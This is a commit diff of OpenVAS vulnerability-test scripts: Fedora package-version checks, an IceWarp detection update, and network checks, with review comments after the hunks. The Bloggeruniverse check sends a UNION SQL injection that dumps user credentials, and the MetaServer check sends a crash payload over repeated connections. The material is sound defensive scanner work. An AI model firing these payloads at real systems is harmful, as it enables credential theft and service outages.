+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(863538);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"risk_factor", value:"High");
+  script_xref(name: "FEDORA", value: "2011-12698");
+  script_cve_id("CVE-2011-2190", "CVE-2011-2191");
+  script_name("Fedora Update for cherokee FEDORA-2011-12698");
+  desc = "
+
+  Vulnerability Insight:
+  Cherokee is a very fast, flexible and easy to configure Web Server. It supports
+  the widespread technologies nowadays: FastCGI, SCGI, PHP, CGI, TLS and SSL
+  encrypted connections, Virtual hosts, Authentication, on the fly encoding,
+  Apache compatible log files, and much more.
+
+
+  Affected Software/OS:
+  cherokee on Fedora 15
+
+  Fix: Please Install the Updated Packages.
+
+  References:
+  http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066222.html
+
+  ";
+
+  script_description(desc);
+  script_summary("Check for the Version of cherokee");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Fedora Local Security Checks");
+  script_dependencies("gather-package-list.nasl");
+  script_require_keys("ssh/login/release");
+  exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+  exit(0);
+}
+
+if(release == "FC15")
+{
+
+  if(isrpmvuln(pkg:"cherokee", rpm:"cherokee~1.2.99~1.fc15", rls:"FC15"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+
+  exit(0);
+}
\ No newline at end of file

Added: trunk/openvas-plugins/scripts/gb_fedora_2011_3627_openldap_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_3627_openldap_fc14.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_3627_openldap_fc14.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,87 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for openldap FEDORA-2011-3627
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(863542);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"cvss_base", value:"6.8");
+  script_tag(name:"risk_factor", value:"High");
+  script_xref(name: "FEDORA", value: "2011-3627");
+  script_cve_id("CVE-2011-1024", "CVE-2011-1025", "CVE-2011-1081");
+  script_name("Fedora Update for openldap FEDORA-2011-3627");
+  desc = "
+
+  Vulnerability Insight:
+  OpenLDAP is an open source suite of LDAP (Lightweight Directory Access
+  Protocol) applications and development tools. LDAP is a set of
+  protocols for accessing directory services (usually phone book style
+  information, but other information is possible) over the Internet,
+  similar to the way DNS (Domain Name System) information is propagated
+  over the Internet. The openldap package contains configuration files,
+  libraries, and documentation for OpenLDAP.
+
+
+  Affected Software/OS:
+  openldap on Fedora 14
+
+  Fix: Please Install the Updated Packages.
+
+  References:
+  http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066251.html
+
+  ";
+
+  script_description(desc);
+  script_summary("Check for the Version of openldap");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Fedora Local Security Checks");
+  script_dependencies("gather-package-list.nasl");
+  script_require_keys("ssh/login/release");
+  exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+  exit(0);
+}
+
+if(release == "FC14")
+{
+
+  if(isrpmvuln(pkg:"openldap", rpm:"openldap~2.4.23~10.fc14", rls:"FC14"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+
+  exit(0);
+}
\ No newline at end of file
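Review bot: the "Vulnerability Insight" section in desc is the openldap package description and says nothing about the flaws behind CVE-2011-1024, CVE-2011-1025 and CVE-2011-1081; since script_cve_id is the only place the issue is identified, a one-line summary of what the update fixes (or at least a sentence pointing the reader to the advisory URL for it) would make the report actionable. Minor: the rls:"FC14" argument to isrpmvuln repeats the release == "FC14" guard directly above it, and the file again lacks a trailing newline.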

Added: trunk/openvas-plugins/scripts/gb_fedora_2011_9820_libsoup_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_9820_libsoup_fc14.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_9820_libsoup_fc14.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,89 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for libsoup FEDORA-2011-9820
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(863546);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_xref(name: "FEDORA", value: "2011-9820");
+  script_cve_id("CVE-2011-2524");
+  script_name("Fedora Update for libsoup FEDORA-2011-9820");
+  desc = "
+
+  Vulnerability Insight:
+  Libsoup is an HTTP library implementation in C. It was originally part
+  of a SOAP (Simple Object Access Protocol) implementation called Soup, but
+  the SOAP and non-SOAP parts have now been split into separate packages.
+  
+  libsoup uses the Glib main loop and is designed to work well with GTK
+  applications. This enables GNOME applications to access HTTP servers
+  on the network in a completely asynchronous fashion, very similar to
+  the Gtk+ programming model (a synchronous operation mode is also
+  supported for those who want it).
+
+
+  Affected Software/OS:
+  libsoup on Fedora 14
+
+  Fix: Please Install the Updated Packages.
+
+  References:
+  http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066219.html
+
+  ";
+
+  script_description(desc);
+  script_summary("Check for the Version of libsoup");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Fedora Local Security Checks");
+  script_dependencies("gather-package-list.nasl");
+  script_require_keys("ssh/login/release");
+  exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+  exit(0);
+}
+
+if(release == "FC14")
+{
+
+  if(isrpmvuln(pkg:"libsoup", rpm:"libsoup~2.32.2~2.fc14", rls:"FC14"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+
+  exit(0);
+}
\ No newline at end of file
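Review bot: the blank line between the two paragraphs of desc ("+  ") carries trailing whitespace inside the string literal, unlike the other blank lines in the block; strip it. The same documentation gap as the other generated checks applies here: the text describes libsoup itself and never states what CVE-2011-2524 is, so the finding gives an administrator only a package name and the advisory link.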

Modified: trunk/openvas-plugins/scripts/gb_merak_mail_server_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_merak_mail_server_detect.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_merak_mail_server_detect.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -7,6 +7,9 @@
 # Authors:
 # Chandan S <schandan at secpod.com>
 #
+# Updated By: Antu Sanadi <santu at secpod.com> on 2011-09-27
+#   Updated to detect the recent versions.
+#
 # Copyright:
 # Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net
 #
@@ -27,16 +30,13 @@
 if(description)
 {
   script_id(800096);
-  script_version("$Revision: 1.0 $");
+  script_version("$Revision: 1.1$");
   script_tag(name:"risk_factor", value:"None");
   script_name("Merak Mail Server Web Mail Version Detection");
   desc = "
-
   Overview: This script will detect the version of Merak Mail Server Web Mail
-  on the remote host and sets the KB.
+  on the remote host and sets the KB.";
 
-  Risk factor: None";
-
   script_description(desc);
   script_summary("Set KB for the version of Merak Mail Server");
   script_category(ACT_GATHER_INFO);
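Review bot: script_version("$Revision: 1.1$") drops the space before the closing "$" that the replaced "$Revision: 1.0 $" had; keep the canonical "$Revision: 1.1 $" form so Subversion keyword expansion stays consistent with the rest of the tree. Dropping the "Risk factor: None" line from desc is fine since the risk_factor tag on the line above remains.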
@@ -47,54 +47,72 @@
 }
 
 
+include("cpe.inc");
 include("http_func.inc");
-include("cpe.inc");
 include("host_details.inc");
 
 ## Constant values
 SCRIPT_OID  = "1.3.6.1.4.1.25623.1.0.800096";
 SCRIPT_DESC = "Merak Mail Server Web Mail Version Detection";
 
-port = 32000;
-banner = get_http_banner(port);
+## Get the default port
+port = get_http_port(default:80);
+if(!port){
+  port = 32000;
+}
 
-if("IceWarp" >!< banner){
+## Check the port status
+if(!get_port_state(port)){
   exit(0);
 }
 
-smtpPort = get_kb_item("Services/smtp");
-if(!smtpPort){
-  smtpPort = 25;
+banner = get_http_banner(port);
+if("IceWarp" >!< banner){
+  exit(0);
 }
 
-imapPort = get_kb_item("Services/imap");
-if(!imapPort){
-  imapPort = 143;
-}
+version = eregmatch(pattern:"(Merak|IceWarp).?([0-9.]+)", string:banner);
+if(version[2] == NULL)
+{
+  smtpPort = get_kb_item("Services/smtp");
+  if(!smtpPort){
+    smtpPort = 25;
+  }
 
-popPort = get_kb_item("Services/pop3");
-if(!popPort){
-  popPort = 110;
+  imapPort = get_kb_item("Services/imap");
+  if(!imapPort){
+    imapPort = 143;
+  }
+
+  popPort = get_kb_item("Services/pop3");
+  if(!popPort){
+    popPort = 110;
+  }
+
+  foreach port (make_list(smtpPort, imapPort, popPort))
+  {
+    banner = get_kb_item(string("Banner/", port));
+    if(banner =~ "IceWarp|Merak")
+    {
+      version = eregmatch(pattern:"(Merak|IceWarp) ([0-9.]+)", string:banner);
+      if(version[2] != NULL){
+         ver = version[2];
+     }
+   }
+  }
 }
+else if(version[2] != NULL){
+ ver = version[2];
+}
 
-foreach port (make_list(smtpPort, imapPort, popPort))
+if(ver)
 {
-  banner = get_kb_item(string("Banner/", port));
-  if(banner =~ "IceWarp|Merak")
-  {
-    ver = eregmatch(pattern:"(Merak|IceWarp) ([0-9.]+)", string:banner);
-    if(ver[2] != NULL)
-    {
-      set_kb_item(name:"MerakMailServer/Ver", value:ver[2]);
-      security_note(data:"Merak Mail Server Web Mail version " + ver[2] +
+  set_kb_item(name:"MerakMailServer/Ver", value:ver);
+  security_note(data:"Merak Mail Server Web Mail version " + ver +
                          " was detected on the host");
-
-      ## build cpe and store it as host_detail
-      cpe = build_cpe(value:ver[2], exp:"^([0-9.]+)", base:"cpe:/a:icewarp:merak_mail_server:");
-      if(!isnull(cpe))
-         register_host_detail(name:"App", value:cpe, nvt:SCRIPT_OID, desc:SCRIPT_DESC);
-
-    }
-    exit(0);
+  ## build cpe and store it as host_detail
+  cpe = build_cpe(value:ver, exp:"^([0-9.]+)", base:"cpe:/a:icewarp:merak_mail_server:");
+  if(!isnull(cpe)){
+    register_host_detail(name:"App", value:cpe, nvt:SCRIPT_OID, desc:SCRIPT_DESC);
   }
 }
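Review bot: the port handling in this hunk only ever probes one HTTP port: get_http_port(default:80) hands back 80 whenever no Services/www entry exists, so the "if(!port){ port = 32000; }" fallback is effectively dead, and the IceWarp webmail default of 32000 (the only port the old code checked) is never tried when some other web server answers on 80. Iterate over the detected www port plus 32000, as the mail-port loop below already iterates over smtp/imap/pop3, and keep the port that produced the match. Smaller points: "foreach port (make_list(smtpPort, imapPort, popPort))" reuses port as the loop variable, so after the loop it no longer holds the web port should the finding ever need to be attributed to it; "else if(version[2] != NULL)" is redundant after "if(version[2] == NULL)", a bare else reads cleaner; and the inner "if(version[2] != NULL){ ver = version[2]; }" block is indented one level off from its surroundings.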

Added: trunk/openvas-plugins/scripts/secpod_bloggeruniverse_sql_injection_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_bloggeruniverse_sql_injection_vuln.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/secpod_bloggeruniverse_sql_injection_vuln.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,106 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_bloggeruniverse_sql_injection_vuln.nasl 17111 2011-09-26 11:29:14 sep $
+#
+# Bloggeruniverse 'editcomments.php' SQL Injection Vulnerability
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902632);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2009-5090");
+  script_bugtraq_id(33744);
+  script_tag(name:"cvss_base", value:"6.8");
+  script_tag(name:"risk_factor", value:"High");
+  script_name("Bloggeruniverse 'editcomments.php' SQL Injection Vulnerability");
+  desc = "
+  Overview: The host is running Bloggeruniverse and is prone to sql injection
+  vulnerability.
+
+  Vulnerability Insight:
+  The flaw is due to input passed via the 'id' parameter to 'editcomments.php'
+  is not properly sanitised before being used in SQL queries.
+
+  Impact:
+  Successful exploitation will let attackers to manipulate SQL queries by
+  injecting arbitrary SQL code.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Bloggeruniverse version 2 Beta.
+
+  Fix: No solution or patch is available as on 27th September 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://sourceforge.net/projects/bloggeruniverse/
+
+  References:
+  http://www.exploit-db.com/exploits/8043/
+  http://xforce.iss.net/xforce/xfdb/48697 ";
+
+  script_description(desc);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_summary("Check if Bloggeruniverse is vulnerable to SQL Injection");
+  script_category(ACT_ATTACK);
+  script_family("Web application abuses");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:port)){
+  exit(0);
+}
+
+## Check for each possible path
+foreach dir (make_list("/bloggeruniverse", "/blog", "/bg", cgi_dirs()))
+{
+  ## Send and Receive the response
+  sndReq = http_get(item:string(dir, "/index.php"), port:port);
+  rcvRes = http_send_recv(port:port, data:sndReq);
+
+  if("Bloggeruniverse" >< rcvRes && "CopyRight &copy;" >< rcvRes)
+  {
+    ## Construct the Attack Request
+    url = dir + "/editcomments.php?id=-2%20union%20all%20select%201,2,3,4,5" +
+             ",6,concat(0x4f70656e564153,0x3a,username,0x3a,password,0x3a,0" +
+             "x4f70656e5641532d53),8%20from%20users";
+
+    if(http_vuln_check(port:port, url:url, pattern:">openVAS:(.+):(.+):openVAS"))
+    {
+      security_hole(port);
+      exit(0);
+    }
+  }
+}
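Review bot: the detection pattern passed to http_vuln_check looks for ">openVAS:(.+):(.+):openVAS", but the injected marker bytes 0x4f70656e564153 decode to "OpenVAS" with an upper-case O (and 0x4f70656e5641532d53 to "OpenVAS-S"), so a case-sensitive match never fires; make the pattern's case agree with the marker or request case-insensitive matching explicitly. Beyond that, the UNION payload pulls the username and password columns of the users table onto the page, which is more than a vulnerability check needs: selecting the constant marker on its own proves the injection without putting credentials into the HTTP response or the scan log. Also version_func.inc is included but nothing in the script uses it, and "prone to sql injection vulnerability" in the overview should read "prone to an SQL injection vulnerability".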

Added: trunk/openvas-plugins/scripts/secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,90 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl 17461 2011-09-27 10:42:13Z sep $
+#
+# IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902478);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-3579", "CVE-2011-3580");
+  script_bugtraq_id(49753);
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability");
+  desc = "
+  Overview: The host is running IceWarp Mail Server and is prone to xml entity
+  injection and information disclosure vulnerability.
+
+  Vulnerability:
+  The flaws are caused due to,
+  - Certain input passed via SOAP messages to 'server/webmail.php' is not
+    properly verified before being used. This can be exploited to disclose the
+    contents of arbitrary files.
+  - An unspecified script, which calls the 'phpinfo()' function, is stored with
+    insecure permissions inside the web root. This can be exploited to gain
+    knowledge of sensitive information.
+
+  Impact:
+  Successful exploitation will let the attacker to gain access to potentially
+  sensitive information, and possibly cause denial-of-service conditions. other
+  attacks may also be possible.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  IceWarp Mail Server 10.3.2 and prior.
+
+  Fix: Upgrade to IceWarp Mail Server 10.3.3 or later,
+  For updates refer, http://www.icewarp.com
+
+  References:
+  http://secunia.com/advisories/46135/
+  http://xforce.iss.net/xforce/xfdb/70026
+  http://xforce.iss.net/xforce/xfdb/70025
+  http://packetstormsecurity.org/files/view/105320/TWSL2011-013.txt ";
+
+  script_description(desc);
+  script_summary("Check for the version of IceWarp Mail Server");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("Web application abuses");
+  script_dependencies("gb_merak_mail_server_detect.nasl");
+  script_require_keys("MerakMailServer/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from kb
+icewarp = get_kb_item("MerakMailServer/Ver");
+if(!icewarp){
+  exit(0);
+}
+
+## Check for IceWarp Mail Server version < 10.3.3
+if(version_is_less(version:icewarp, test_version:"10.3.3")){
+  security_warning(0);
+}
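Review bot: security_warning(0) reports against port 0 because the detection script this check depends on stores only MerakMailServer/Ver and not the port the banner came from; have gb_merak_mail_server_detect.nasl record the port in the KB as well and read it here so the finding lands on the right service. In desc, "Vulnerability:" should be "Vulnerability Insight:" to match the other scripts, "Fix: Upgrade to IceWarp Mail Server 10.3.3 or later," should end with a full stop rather than a comma, and "other attacks may also be possible" needs a capital O.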

Modified: trunk/openvas-plugins/scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -64,13 +64,13 @@
   script_copyright("Copyright (C) 2011 SecPod");
   script_family("Denial of Service");
   script_dependencies("find_service.nes");
-  script_require_ports(2194);
+  script_require_ports(2189);
   exit(0);
 }
 
 
 ## Get Default Port
-port = 2194;
+port = 2189;
 if(!get_port_state(port)){
  exit(0);
 }
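Review bot: the port changes from 2194 to 2189 in both script_require_ports and the "port =" assignment without a word in this hunk about why; the commit log only says the exploit was not working, so add an "Updated By" line in the header (as the Merak script gained in this same commit) or a comment at the assignment stating that 2189 is the MetaServer RT listener. Defining the value once above the description block and referencing it from both places would also keep the two from drifting apart again.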
@@ -82,15 +82,34 @@
 }
 
 ## Construct Attack Request
-req =  crap(data: raw_string(0x80), length:1024);
+req = raw_string( 0xcd, 0xab, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+                  0x00, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
+                  0x00, 0x00, 0x00, 0x00, 0x52, 0x4f, 0x53, 0x43,
+                  0x4f );
 
 ## Sending Attack
 send(socket:soc, data:req);
+res = recv(socket:soc, length:200);
 close(soc);
 
-## Waiting
-sleep(3);
+## Confirm the application
+if("Metastock" >!< res){
+  exit(0);
+}
 
+## Send multiple reconnection request
+for(i = 0; i < 5; i++)
+{
+  soc1 = open_sock_tcp(port);
+  if(!soc1){
+    break;
+  }
+
+  send(socket:soc1, data:req);
+  close(soc1);
+  sleep(1);
+}
+
 ## Open the socket and Check server is dead or alive
 soc = open_sock_tcp(port);
 if(!soc)
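Review bot: the application confirmation in this hunk is done by sending the attack request itself ("send(socket:soc, data:req);" followed by "res = recv(socket:soc, length:200);") and then testing for "Metastock" in the reply: if the first packet already takes the service down, recv returns nothing, the ">!<" check fires and the script exits without reporting, a false negative on exactly the targets that are most exposed. Confirm the product from the reply to a benign request first, then send the crash payload. Two more points: the "sleep(3)" before the liveness probe was dropped, so the final open_sock_tcp(port) can run while the server is still tearing down the fifth connection and report a crash that is really a momentary refusal; and a comment on what the bytes in the raw_string request represent would help whoever has to adjust this next.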
@@ -98,5 +117,4 @@
   security_hole(port);
   exit(0);
 }
-
 close(soc);

Added: trunk/openvas-plugins/scripts/secpod_tooltalk_rpc_database_server_mult_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_tooltalk_rpc_database_server_mult_vuln.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/secpod_tooltalk_rpc_database_server_mult_vuln.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,100 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_tooltalk_rpc_database_server_mult_vuln.nasl 17217 2011-09-23 12:14:17 sep $
+#
+# CDE ToolTalk RPC Database Server Multiple Vulnerabilities
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902477);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2002-0677", "CVE-2002-0678");
+  script_bugtraq_id(5083, 5082);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_name("CDE ToolTalk RPC Database Server Multiple Vulnerabilities");
+  desc = "
+  Overview: This host is running the CDE ToolTalk Database Server and is
+  prone to the multiple vulnerabilities.
+
+  Vulnerability Insight:
+  Multiple flaws are due to,
+  - An error in the handling symbolic link. The server does not check to ensure
+    that it is not a symbolic link. If an attacker creates a symbolic link on
+    the filesystem with the path/filename of the logfile, transaction data will
+    be written to the destination file as root.
+  - There are no checks to restrict the range of the index value. Consequently,
+    malicious file descriptor values supplied by remote clients may cause
+    writes to occur far beyond the table in memory. The only value written is
+    a NULL word, limiting the consequences.
+
+  Impact:
+  Successful exploitation could allow attackers to remotely deleting arbitrary
+  files and creating arbitrary directory entries. Further, attackers might be
+  able to crash the ToolTalk RPC database server, denying service to legitimate
+  users.
+
+  Impact Level: System/Application
+
+  Affected Software :
+  CDE ToolTalk RPC database server
+
+  Fix: Apply the patch from below link,
+  http://www.kb.cert.org/vuls/id/975403
+
+  References:
+  http://www.kb.cert.org/vuls/id/975403
+  http://www.kb.cert.org/vuls/id/299816
+  http://www.kb.cert.org/vuls/id/AAMN-5B239R
+  http://www.cert.org/advisories/CA-2002-20.html ";
+
+  script_description(desc);
+  script_copyright("Copyright (c) 2011 SecPod,");
+  script_summary("Checks the presence of CDE ToolTalk RPC Database Server");
+  script_category(ACT_GATHER_INFO);
+  script_family("RPC");
+  script_dependencies("secpod_rpc_portmap.nasl");
+  script_require_keys("rpc/portmap");
+  exit(0);
+}
+
+include("misc_func.inc");
+
+if(report_paranoia < 2){
+ exit(0);
+}
+
+RPC_PROG = 100083;
+
+## Get the rpc port, CDE ToolTalk Database Server
+port = get_rpc_port(program: RPC_PROG, protocol: IPPROTO_UDP);
+if(port)
+{
+  security_hole(port);
+  exit(0);
+}
+
+port = get_rpc_port(program: RPC_PROG, protocol: IPPROTO_TCP);
+if(port){
+  security_hole(port);
+}
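Review bot: this is a presence-only test: get_rpc_port(program: 100083, ...) returning a port is reported as a High security_hole with no version or patch check, which is why it sits behind "report_paranoia < 2"; desc should say so (in the Overview or after Fix) so an administrator reading the report knows a patched rpc.ttdbserverd triggers it too. Wording fixes in desc: "Multiple flaws are due to," should end with a colon; "An error in the handling symbolic link." should read "An error in symbolic link handling:"; "could allow attackers to remotely deleting arbitrary files and creating arbitrary directory entries" should read "could allow attackers to remotely delete arbitrary files and create arbitrary directory entries"; "Affected Software :" should be "Affected Software/OS:" like the other scripts; and script_copyright("Copyright (c) 2011 SecPod,") has a stray trailing comma.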
